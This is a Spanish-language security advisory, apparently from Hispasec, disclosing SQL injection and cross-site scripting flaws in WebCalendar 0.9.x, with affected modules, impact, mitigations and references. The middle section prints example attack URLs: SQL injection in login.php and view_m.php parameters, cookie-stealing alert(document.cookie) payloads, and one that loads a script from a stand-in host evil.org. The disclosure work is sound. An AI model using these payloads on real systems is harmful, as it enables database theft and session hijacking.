WebCalendar en sus versiones 0.9.x se ve afectado por diversos
problemas de seguridad que pueden permitir a un atacante la realización
de cross site scripting o la inyección de código SQL.
WebCalendar es una aplicación desarrollada en PHP empleada para
mantener un calendario y agenda para una o más personas
El problema reside en la validación incorrecta de diversos módulos php
de WebCalendar, en concreto los afectados son view_t.php, view_w.php,
view_v.php, y login.php
http://www.sistema_vulnerable.com/webcalendar/view_m.php?id=comando sql adicional
http://www.sistema_vulnerable.com/webcalendar/login.php?user=’comando%20sql%20adicional
http://www.sistema_vulnerable.com/webcalendar/login.php?password=’comando%20sql%20adicional
Un usuario que consiga explotar exitosamente esta vulnerabilidad podrá
lograr acceso a información sensible almacenada en la base de datos de
la aplicación. Esta información podrá ser empleada para construir
ataques posteriores contra el sistema vulnerable.
También se ha anunciado la existencia de vulnerabilidades de
cross-site scripting en diversos módulos. En este caso el problema se
encuentra en includes/js/colors.php, week.php, day.php, month.php,
week_details.php, view_l.php, view_m.php, view_t.php, view_v.php,
view_w.php, y week_details.php. Las vulnerabilidades pueden permitir
al atacante la creación de un enlace malicioso que contenga código
HTML o script que se ejecutará en el navegador del usuario.
Entre los ejemplos de cross-site scripting:
<a href="http://www.sistema_vulnerable.com/webcalendar/colors.php?color=alert(document.cookie)»>http://www.sistema_vulnerable.com/webcalendar/colors.php?color=alert(document.cookie)
alert(document.cookie)»>http://www.sistema_vulnerable.com/webcalendar/week.php?user=»>alert(document.cookie)
<a href="http://www.sistema_vulnerable.com/webcalendar/week.php?eventinfo=alert(document.cookie)»>http://www.sistema_vulnerable.com/webcalendar/week.php?eventinfo=alert(document.cookie)
<a href="http://www.sistema_vulnerable.com/webcalendar/week.php?eventinfo=<script src=http://www.evil.org/evilcode.js»>http://www.sistema_vulnerable.com/webcalendar/week.php?eventinfo=<script src=http://www.evil.org/evilcode.js
Para evitar los efectos de esta vulnerabilidad, se recomienda editar el
código fuente para que se validen las entradas del usuario de forma
correcta. También se recomienda configurar PHP para utilizar
«magic_quotes_gpc».
roman@hispasec.com
Más información:
WebCalendar Multiple Module SQL Injection Vulnerabilities
http://www.securityfocus.com/bid/8540
WebCalendar Multiple Cross-Site Scripting Vulnerabilities
http://www.securityfocus.com/bid/8539
Webcalendar <= 0.9.42 Cross Site Scripting Attacks and Potential SQL Injection
http://www.securityfocus.com/archive/1/336047
WebCalendar
http://webcalendar.sourceforge.net/
